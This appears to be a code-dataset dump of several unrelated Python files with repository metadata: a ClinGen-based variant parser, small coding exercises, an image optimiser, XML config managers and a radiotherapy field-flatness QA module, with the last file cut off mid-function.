| 35.90625 | 88 | 0.58181 |
dae43e027cc58c09a9ba624be8d3475605035bce
| 4,368 |
py
|
Python
|
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
import requests
from collections import defaultdict
from biothings.utils.dataload import dict_sweep, value_convert_to_number, unlist, open_anyfile
class DictQuery(dict):
"""Parse nested dictionary
"""
def get(self, path, default=None):
"""Extract value from dictionary based on path
"""
keys = path.split("/")
val = None
for key in keys:
if val:
if isinstance(val, list):
val = [v.get(key, default) if v else None for v in val]
else:
val = val.get(key, default)
else:
val = dict.get(self, key, default)
if not val:
break
return val
def batch_query_myvariant_id_from_clingen(hgvs_ids, assembly):
"""Query ClinGen to get myvariant IDs for all input non genomic hgvs IDs
Keyword arguments:
hgvs_ids -- list of non genomic hgvs IDs
assembly -- genomic assembly, either hg19 or hg38
"""
def parse_myvariant_ids(doc, assembly):
"""Parse the results from clingen to retrieve myvariant id
Keyword arguments:
doc -- doc retrieved from clingen
"""
ASSEMBLY_MAPPING = {
"hg19": "MyVariantInfo_hg19",
"hg38": "MyVariantInfo_hg38"
}
extract_path = 'externalRecords/' + ASSEMBLY_MAPPING[assembly]
res = DictQuery(doc).get(extract_path)
if res:
return [_doc['id'] for _doc in res if _doc]
else:
return []
hgvs_dict = {}
hgvs_ids = list(set(hgvs_ids))
print('total hgvs ids to process is: {}'.format(len(hgvs_ids)))
for i in range(0, len(hgvs_ids), 1000):
print('currently processing {}th variant'.format(i))
if i + 1000 <= len(hgvs_ids):
batch = hgvs_ids[i: i + 1000]
else:
batch = hgvs_ids[i:]
data = '\n'.join(batch)
res = requests.post('http://reg.genome.network/alleles?file=hgvs',
data=data,
headers={'content-type': "text/plain" }).json()
# loop through clingen results and input hgvs id in parallel
# construct a mapping dictionary with key as input hgvs id
# and value as myvariant hgvs id
for _doc, _id in zip(res, batch):
hgvs_dict[_id] = parse_myvariant_ids(_doc, assembly)
return hgvs_dict
def _map_line_to_json(fields):
"""Mapping each lines in csv file into JSON doc
"""
one_snp_json = {
"gene": fields[1],
"variant_id": fields[2],
"exon": fields[3],
"egl_variant": fields[4],
"egl_protein": fields[5],
"egl_classification": fields[6],
"egl_classification_date": fields[7],
"hgvs": fields[8].split(" | ")
}
return unlist(dict_sweep(value_convert_to_number(one_snp_json), vals=[""]))
def load_data(data_folder, assembly="hg19"):
"""Load data from EMV csv file into list of JSON docs
"""
input_file = os.path.join(data_folder, "EmVClass.2018-Q2.csv")
assert os.path.exists(input_file), "Can't find input file '%s'" % input_file
with open_anyfile(input_file) as in_f:
lines = set(list(in_f))
lines = [_doc.strip().split(',') for _doc in lines]
print(list(lines)[0])
results = defaultdict(list)
# mapping non genomic hgvs ids to genomic hgvs ids used in MyVariant
hgvs_ids = [_item[4] for _item in lines]
#print(hgvs_ids)
hgvs_mapping_dict = batch_query_myvariant_id_from_clingen(hgvs_ids, assembly)
# loop through csv doc to convert into json docs
for row in lines:
# structure the content of emv docs
variant = _map_line_to_json(row)
# fetch corresponding genomic hgvs ids
mapped_ids = hgvs_mapping_dict[row[4]]
# could be one non-genomic hgvs id mapping to mulitple genomic ones
if mapped_ids:
for _id in mapped_ids:
results[_id].append(variant)
for k, v in results.items():
if len(v) == 1:
doc = {'_id': k, 'emv': v[0]}
else:
doc = {'_id': k, 'emv': [_doc for _doc in v]}
print('case of multi hits', doc)
yield doc
| 35.225806 | 94 | 0.581731 |
97773a4d3d3a4700454d47c168040a1528d9ef1b
| 143 |
py
|
Python
|
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def end_other(a, b):
a = a.lower()
b = b.lower()
if a[-(len(b)):] == b or a == b[-(len(a)):]:
return True
return False
| 20.428571 | 48 | 0.454545 |
c182cadfa61e971b84daba5d58d73de313bad748
| 1,083 |
py
|
Python
|
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import glob, os, subprocess, sys
status, _ = subprocess.getstatusoutput('convert -h')
if status != 1:
print("`convert` not found. ImageMagick is required to to optimise images.")
print("<http://www.imagemagick.org/index.php>")
sys.exit()
for filename in glob.glob('assets/img/*.original.jpg'):
directory = os.path.dirname(filename)
# foo.original.jpg -> foo.jpg
basename = os.path.splitext(os.path.splitext(filename)[0])[0]
new_name = f'{basename}.jpg'
print(f'Processing {filename} -> {new_name}')
# Adapted from https://stackoverflow.com/questions/7261855/recommendation-for-compressing-jpg-files-with-imagemagick
command = [
'convert',
'-strip',
'-interlace', 'Plane',
'-gaussian-blur', '0.05',
'-quality', '85%',
# 'x1080' will scale the image's height to 1080px while maintaining the
# current aspect ratio.
'-resize', 'x1080',
filename,
new_name,
]
subprocess.run(command, check=True)
print("All images optimised ☀️")
| 29.27027 | 120 | 0.635272 |
de0807ded9a250b399a256259a8a5bb97ec944b7
| 342 |
py
|
Python
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
import spacy.tokens
import spacy.lang.en
assert isinstance(
nlp, spacy.lang.en.English
), "nlpオブジェクトはEnglishクラスのインスタンスでなければなりません"
assert isinstance(doc, spacy.tokens.Doc), "テキストをnlpオブジェクトで処理してdocを作成しましたか?"
assert "print(doc.text)" in __solution__, "doc.textをプリントしましたか?"
__msg__.good("正解です!")
| 28.5 | 79 | 0.707602 |
e75bcb4f291b3ac4953a67fb89624c78a72246cb
| 1,379 |
py
|
Python
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 170 |
2020-08-12T12:07:01.000Z
|
2022-03-07T02:38:26.000Z
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 195 |
2020-08-13T03:22:15.000Z
|
2022-03-30T07:40:25.000Z
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 67 |
2020-08-14T02:07:46.000Z
|
2022-03-28T10:05:33.000Z
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import time
class BenchmarkTimer(object):
def __init__(self):
self.start_timer_step = 0
self.end_timer_step = 100001
self.cur_step = 0
self.total_time = 0.0
self.step_start = 0.0
def set_start_step(self, step):
self.start_timer_step = step
def time_begin(self):
self.cur_step += 1
if self.cur_step > self.start_timer_step:
self.step_start = time.time()
def time_end(self):
if self.cur_step > self.start_timer_step:
end = time.time()
self.total_time += end - self.step_start
def time_per_step(self):
if self.cur_step <= self.start_timer_step:
return 0.0
return self.total_time / (self.cur_step - self.start_timer_step)
| 32.833333 | 73 | 0.685279 |
8217bf14566c840cdb0a8ca5a97a8e83e6cd9793
| 10,719 |
py
|
Python
|
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2020 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import xml.etree.ElementTree as ET
from xdevice import platform_logger
from core.constants import ConfigFileConst
LOG = platform_logger("config_manager")
CONFIG_PATH = os.path.join(sys.framework_res_dir, "config")
class FrameworkConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.FRAMECONFIG_FILEPATH))
else:
self.filepath = filepath
def get_framework_config(self, target_name):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
value = sub.attrib.get("name")
if value and value != "":
data_list.append(value)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_test_category_info(self, target_name="test_category"):
test_type_timeout_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
name = sub.attrib.get("name")
desc = sub.attrib.get("desc")
timeout = sub.attrib.get("timeout")
if name and desc and timeout:
test_type_timeout_dic[name] = (desc, timeout)
else:
LOG.error("The %s file does not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return test_type_timeout_dic
def get_all_category_info(self, target_name="all_category"):
return self.get_framework_config(target_name)
class FilterConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(
os.path.join(CONFIG_PATH,
ConfigFileConst.FILTERCONFIG_FILEPATH))
else:
self.filepath = filepath
def get_filtering_list(self, target_name, product_form):
filter_data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
if child.tag != target_name:
continue
for child2 in child:
if child2.tag != product_form.lower():
continue
for child3 in child2:
if child3.text != "" and child3.text is not None:
filter_data_list.append(child3.text)
else:
LOG.error("The %s file does not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return filter_data_list
def get_filter_config_path(self):
return self.filepath
class ResourceConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.RESOURCECONFIG_FILEPATH))
if not os.path.exists(self.filepath):
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.CASE_RESOURCE_FILEPATH))
else:
self.filepath = filepath
def get_resource_config(self):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
temp_list = [child.attrib]
for sub in child:
temp_list.append(sub.attrib)
data_list.append(temp_list)
else:
LOG.error("The %s is not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_resource_config_path(self):
return self.filepath
class UserConfigManager(object):
def __init__(self, config_file=""):
if config_file == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.USERCONFIG_FILEPATH))
else:
if os.path.isabs(config_file):
self.filepath = config_file
else:
self.filepath = os.path.abspath(
os.path.join(CONFIG_PATH, config_file))
def get_user_config_list(self, tag_name):
data_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
if tag_name == child.tag:
for sub in child:
data_dic[sub.tag] = sub.text
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_dic
@classmethod
def content_strip(cls, content):
return content.strip()
@classmethod
def _verify_duplicate(cls, items):
if len(set(items)) != len(items):
LOG.warning("find duplicate sn config, configuration incorrect")
return False
return True
def _handle_str(self, content):
config_list = map(self.content_strip, content.split(';'))
config_list = [item for item in config_list if item]
if config_list:
if not self._verify_duplicate(config_list):
return []
return config_list
def get_sn_list(self):
sn_select_list = []
try:
data_dic = {}
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for node in root.findall("environment/device"):
if node.attrib["type"] != "usb-hdc":
continue
for sub in node:
data_dic[sub.tag] = sub.text if sub.text else ""
sn_config = data_dic.get("sn", "")
if sn_config:
sn_select_list = self._handle_str(sn_config)
break
except ET.ParseError as xml_exception:
LOG.warning("occurs exception:{}".format(xml_exception.args))
sn_select_list = []
return sn_select_list
def get_user_config(self, target_name, sub_target=""):
data_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
if not node:
return None
if sub_target != "":
node = node.find(sub_target)
if not node:
return None
for sub in node:
if sub.text is None:
data_dic[sub.tag] = ""
else:
data_dic[sub.tag] = sub.text
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_dic
def get_user_config_flag(self, target_name, sub_target):
config_flag = self.get_user_config(target_name).get(sub_target, "")
if config_flag == "":
return False
return True if config_flag.lower() == "true" else False
def get_device(self, target_name):
data_dic = {}
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
config_content = tree.getroot()
for node in config_content.findall(target_name):
for sub in node:
if sub.text is None:
data_dic[sub.tag] = ""
else:
data_dic[sub.tag] = sub.text
break
return data_dic
def get_test_cases_dir(self):
testcase_path = self.get_user_config("test_cases").get("dir", "")
if testcase_path != "":
testcase_path = os.path.abspath(testcase_path)
return testcase_path
class BuildConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.BUILDCONFIG_FILEPATH))
else:
self.filepath = filepath
def get_build_config(self, target_name):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
value = sub.attrib.get("name")
if value and value != "":
data_list.append(value)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_build_path(self):
return self.filepath
| 37.479021 | 79 | 0.536711 |
d4523603323d200479e760b2e51a2da82022b0b2
| 62,034 |
py
|
Python
|
app/qa/field.py
|
MePyDo/pygqa
|
61cde42ee815968fdd029cc5056ede3badea3d91
|
[
"MIT"
] | 3 |
2021-02-25T13:19:52.000Z
|
2021-03-03T03:46:46.000Z
|
app/qa/field.py
|
MedPhyDO/pygqa
|
580b2c6028d2299790a38262b795b8409cbfcc37
|
[
"MIT"
] | null | null | null |
app/qa/field.py
|
MedPhyDO/pygqa
|
580b2c6028d2299790a38262b795b8409cbfcc37
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = "R. Bauer"
__copyright__ = "MedPhyDO - Machbarkeitsstudien des Instituts für Medizinische Strahlenphysik und Strahlenschutz am Klinikum Dortmund im Rahmen von Bachelor und Masterarbeiten an der TU-Dortmund / FH-Dortmund"
__credits__ = ["R.Bauer", "K.Loot"]
__license__ = "MIT"
__version__ = "0.1.2"
__status__ = "Prototype"
from pylinac import FlatSym
from pylinac.core.profile import MultiProfile
from pylinac.core.geometry import Point
from app.base import ispBase
from app.image import DicomImage
from app.check import ispCheckClass
from isp.config import dict_merge
import numpy as np
import pandas as pd
from dotmap import DotMap
import matplotlib.pyplot as plt
# logging
import logging
logger = logging.getLogger( "MQTT" )
import math
def pointRotate(origin, point, angle):
"""
Rotate a point counterclockwise by a given angle around a given origin.
with the usual axis conventions:
x increasing from left to right, y increasing vertically upwards.
The angle should be given in dec.
"""
ox = origin.x
oy = origin.y
px = point.x
py = point.y
angle = math.radians( angle )
qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return Point( qx, qy )
class FSImage( FlatSym, DicomImage ):
def __init__(self, pathOrData=None, **kwargs ):
""" Erweitert PFDicomImage um die eigene DicomImage Klasse
"""
# die eigene Erweiterung
DicomImage.__init__( self, pathOrData )
class qa_field( ispCheckClass ):
"""Erweitert die Klasse , um eine eigene DicomImage Erweiterung zu verwenden
"""
def __init__( self, checkField, baseField=None, normalize: str="none" ):
""" checkField und ggf baseField laden und ispCheckClass initialisieren
"""
self.checkField = checkField
self.baseField = baseField
if self.checkField and self.baseField:
# checkField und baseField wurden angegeben, normalize möglich
# self.image und self.baseImage initialisieren und ggf normalisieren
ispCheckClass.__init__( self,
image=FSImage( self.checkField ),
baseImage=FSImage( self.baseField ),
normalize=normalize
)
elif self.checkField:
# nur checkfield wurde angegeben
# self.image initialisieren
ispCheckClass.__init__( self,
image=FSImage( self.checkField )
)
def getProfileData( self ):
"""Profildaten aus image holen flatness='iec' symmetry='pdq iec'
DONE: flatness selbst berechnen - flatness = (dmax-dmin) / np.mean(m)
"""
def flatness_calculation(profile):
"""IEC specification for calculating flatness
der CAX wird aus 5 benachbarten Werten gebildet
"""
cax_idx = profile.fwxm_center()
# cax von 5 benachbarten Werten bilden
cax5 = np.mean( profile[cax_idx-2:cax_idx+3] )
#print( cax, profile, cax5 )
dmax = profile.field_calculation(field_width=0.8, calculation='max')
dmin = profile.field_calculation(field_width=0.8, calculation='min')
flatness = (dmax - dmin) / cax5 * 100
lt_edge, rt_edge = profile.field_edges()
return flatness, dmax, dmin, lt_edge, rt_edge
from pylinac.core.profile import SingleProfile
vert_position = 0.5
horiz_position = 0.5
vert_profile = SingleProfile(self.image.array[:, int(round(self.image.array.shape[1] * vert_position))])
horiz_profile = SingleProfile(self.image.array[int(round(self.image.array.shape[0] * horiz_position)), :])
vert_flatness, vert_max, vert_min, vert_lt, vert_rt = flatness_calculation(vert_profile)
horiz_flatness, horiz_max, horiz_min, horiz_lt, horiz_rt = flatness_calculation(horiz_profile)
flatness = {
'method': "IEC",
'horizontal': {
'value': horiz_flatness, 'profile': horiz_profile, 'profile max': horiz_max, 'profile min': horiz_min, 'profile left': horiz_lt, 'profile right': horiz_rt,
},
'vertical': {
'value': vert_flatness, 'profile': vert_profile, 'profile max': vert_max, 'profile min': vert_min, 'profile left': vert_lt, 'profile right': vert_rt,
},
}
return {
'filename': self.infos["filename"],
'Kennung': self.infos["Kennung"],
'type': self.infos['testTags'],
'unit': self.infos['unit'],
'energy': self.infos['energy'],
'gantry' : self.infos['gantry'],
'collimator': self.infos['collimator'],
'flatness': flatness
}
def plotProfile(self, data, metadata={} ):
"""Ein horizontale und vertikale Profilachse plotten
Parameters
----------
data : dict
metadata : dict
profileSize
profileTitle - format Ersetzungen aus self.infos sind möglich
"""
# plotbereiche festlegen und profileSize als imgSize übergeben
fig, ax = self.initPlot( imgSize=metadata["profileSize"], nrows=2 )
# axes coordinates are 0,0 is bottom left and 1,1 is upper right
# Kurven Informationen
if not "profileTitle" in metadata:
metadata["profileTitle"] = "{Kennung} - Energie:{energy} Gantry:{gantry:.1f} Kolli:{collimator:.1f}"
ax[0].set_title( metadata["profileTitle"].format( **self.infos ) )
#x= np.divide(data["horizontal"]['profile'].values, self.image.dpmm + self.image.cax.x)
#ax[0].get_xaxis().set_ticks( np.arange( self.mm2dots_X(-200), self.mm2dots_X(200), self.mm2dots_X(50) ) )
#ax[0].get_xaxis().set_ticklabels([-200,0,200])
#ax[0].set_xlim([ self.mm2dots_X(-210), self.mm2dots_X(210) ])
#ax[0].set_title( 'horizontal' )
# 2. Kurve horizontal
# x-Achse
ax[0].get_xaxis().set_ticklabels([])
ax[0].get_xaxis().set_ticks( [] )
# y-achse
ax[0].get_yaxis().set_ticklabels([])
ax[0].get_yaxis().set_ticks( [] )
# kurve plotten
ax[0].plot(data["horizontal"]['profile'].values , color='b')
# links rechts min max
ax[0].axhline(data["horizontal"]['profile max'], color='g', linewidth=1 )
ax[0].axhline(data["horizontal"]['profile min'], color='g', linewidth=1 )
ax[0].axvline(data["horizontal"]['profile left'], color='g', linewidth=1, linestyle='-.')
ax[0].axvline(data["horizontal"]['profile right'], color='g', linewidth=1, linestyle='-.')
cax_idx = data["horizontal"]['profile'].fwxm_center()
ax[0].axvline(cax_idx, color='g', linewidth=1, linestyle='-.')
# limits nach dem autom. setzen der Kurve
xlim = ax[0].get_xlim()
width = xlim[1] + xlim[0]
ylim = ax[0].get_ylim()
height = ylim[1] + ylim[0]
ax[0].text(
width / 2, height / 10,
#self.image.mm2dots_X(0), # x-Koordinate: 0 ganz links, 1 ganz rechts
#self.image.mm2dots_Y(500), # y-Koordinate: 0 ganz oben, 1 ganz unten
'crossline', # der Text der ausgegeben wird
ha='center', # horizontalalignment
va='center', # verticalalignment
fontsize=20, # 'font' ist äquivalent
alpha=.5 # Floatzahl von 0.0 transparent bis 1.0 opak
)
#ax[0].text(2.5, 2.5, 'horizontal', ha='center', va='center', size=20, alpha=.5)
#ax[0].set_title('Horizontal')
# 2. Kurve vertikal
# label und Ticks abschalten
# x-Achse
ax[1].get_xaxis().set_ticklabels([])
ax[1].get_xaxis().set_ticks( [] )
# y-achse
ax[1].get_yaxis().set_ticklabels([])
ax[1].get_yaxis().set_ticks( [] )
# Kurve plotten
ax[1].plot(data["vertical"]['profile'].values, color='r')
# links rechts min max
ax[1].axhline(data["vertical"]['profile max'], color='g', linewidth=1)
ax[1].axhline(data["vertical"]['profile min'], color='g', linewidth=1)
ax[1].axvline(data["vertical"]['profile left'], color='g', linewidth=1, linestyle='-.')
ax[1].axvline(data["vertical"]['profile right'], color='g', linewidth=1, linestyle='-.')
cax_idx = data["vertical"]['profile'].fwxm_center()
ax[1].axvline(cax_idx, color='g', linewidth=1, linestyle='-.')
#ax[1].set_title('Vertikal')
# limits nach dem autom. setzen der Kurve
xlim = ax[0].get_xlim()
width = xlim[1] + xlim[0]
ylim = ax[0].get_ylim()
height = ylim[1] + ylim[0]
ax[1].text(
width / 2, height / 10,
#self.image.mm2dots_X(0),
#self.image.mm2dots_Y(500),
'inline',
ha='center',
va='center',
size=20,
alpha=.5
)
import matplotlib.pyplot as plt
# Layout optimieren
plt.tight_layout(pad=0.4, w_pad=1.0, h_pad=1.0)
# data der Grafik zurückgeben
return self.getPlot()
def find4Qdata( self, field=None ):
""" Die transmissions eines 4 Quadranten Feldes im angegebenem Bereich ermitteln
Reihenfolge in result 'Q2Q1','Q2Q3','Q3Q4','Q1Q4'
[start:stop:step, start:stop:step ]
roi = np.array([
[11, 12, 13, 14, 15],
[21, 22, 23, 24, 25],
[31, 32, 33, 34, 35],
[41, 42, 43, 44, 45],
[51, 52, 53, 54, 55]])
print( roi[ : , 0:1 ] )
[[11] [21] [31] [41] [51]] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ 0 ] )
[11 12 13 14 15] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ 0:1, ] )
[[11 12 13 14 15]] - ( 5 Line2D nicht gezeichnet)
print( roi[ 0:1, ][0] )
[11 12 13 14 15] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ :, -1: ] )
[[15] [25] [35] [45] [55]] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ -1 ] )
[51 52 53 54 55] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ -1:, : ][0] )
[51 52 53 54 55] - ( 1 Line2D gezeichnet LU-RO)
# richtungsumkehr
print( roi[ ::-1, -1: ] )
[[55] [45] [35] [25] [15]] - ( 1 Line2D gezeichnet LO-RU)
"""
if not field:
field = { "X1":-50, "X2": 50, "Y1": -50, "Y2": 50 }
roi = self.image.getRoi( field ).copy()
result = {}
result['Q2Q1'] = {
'name' : 'Q2 - Q1',
'profile' : MultiProfile( roi[:, 0:1] ),
'field' : field
}
result['Q2Q3'] = {
'name' : 'Q2 - Q3',
'profile' : MultiProfile( roi[ 0:1, ][0] ),
'field' : field
}
result['Q3Q4'] = {
'name' : 'Q3 - Q4',
'profile' : MultiProfile( roi[ :, -1: ] ),
'field' : field
}
result['Q1Q4'] = {
'name' : 'Q1 - Q4',
'profile' : MultiProfile( roi[ -1:, : ][0] ),
'field' : field
}
#print( result )
for k in result:
#print(k)
p_min = np.min( result[k]["profile"] )
p_max = np.max( result[k]["profile"] )
result[k]["min"] = p_min
result[k]["max"] = p_max
result[k]["value"] = (lambda x: p_min if x < 0.9 else p_max )(p_min)
return {
'filename': self.infos["filename"],
'Kennung': self.infos["Kennung"],
'type': self.infos['testTags'],
'unit': self.infos['unit'],
'energy': self.infos['energy'],
'gantry' : self.infos['gantry'],
'collimator': self.infos['collimator'],
'field' : field,
'result' : result
}
def plot4Qprofile( self, data , metadata={} ):
""" Ein angegebenes 4Q Profil plotten
Parameters
----------
data : dict
"""
# plotbereiche festlegen
fig, ax = self.initPlot( metadata["profileSize"] )
#print("plot4Qprofile", data)
ax.set_title(data["name"])
# kurve plotten
ax.plot(data["profile"].values, color='b')
# y Achsenlimit
ax.set_ylim(0.5, 1.5)
# x-Achse
ax.get_xaxis().set_ticklabels([ data["name"][0:2], data["name"][-2:] ])
ax.get_xaxis().set_ticks( [0, len(data["profile"].values) ] )
# y-achse anzeigen
ax.get_yaxis().set_ticklabels( [0.75, 1, 1.25] )
ax.get_yaxis().set_ticks( [0.75, 1, 1.25] )
# grid anzeigen
ax.grid( True )
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
# data der Grafik zurückgeben
return self.getPlot()
class checkField( ispBase ):
def _doField_one2n(self, fileData, md={}, passedOn=True, withOffsets=False):
"""
TODO: query aus tolerance?
openFieldQuery = md.current.tolerance.default.check.query
fieldQuery = openFieldQuery.replace("==", "!=")
Parameters
----------
fileData : TYPE
DESCRIPTION.
overrideMD : TYPE, optional
DESCRIPTION. The default is {}.
passedOn : TYPE, optional
DESCRIPTION. The default is True.
withOffsets : TYPE, optional
DESCRIPTION. The default is False.
Returns
-------
TYPE
DESCRIPTION.
result : TYPE
DESCRIPTION.
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( md ), self.metadata )
#md.pprint(pformat='json')
def evaluate( df_group ):
"""Evaluate grouped Fields.
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
#
evaluation_table = [ {
'Kennung': baseField.infos["RadiationId"],
'doserate': baseField.infos["doserate"],
'ME': baseField.infos["ME"],
'baseME': baseField.infos["ME"],
'baseMeanDose': 1,
'fieldMeanDose': baseMeanDose
}]
# print BaseField Image
img = baseField.image.plotImage( **md.plotImage )
self.pdf.image(img, **md.plotImage_pdf )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldMeanDose = checkField.getMeanDose( md["doseArea"] )
#
evaluation_table.append( {
'Kennung': checkField.infos["Kennung"],
'doserate': checkField.infos["doserate"],
'ME': checkField.infos["ME"],
'baseME': baseField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': fieldMeanDose
} )
if md["print_all_images"] == True:
# print checkField Image
img = checkField.image.plotImage( **md.plotImage )
self.pdf.image(img, **md.plotImage_pdf )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
evaluation_df = pd.DataFrame( evaluation_table )
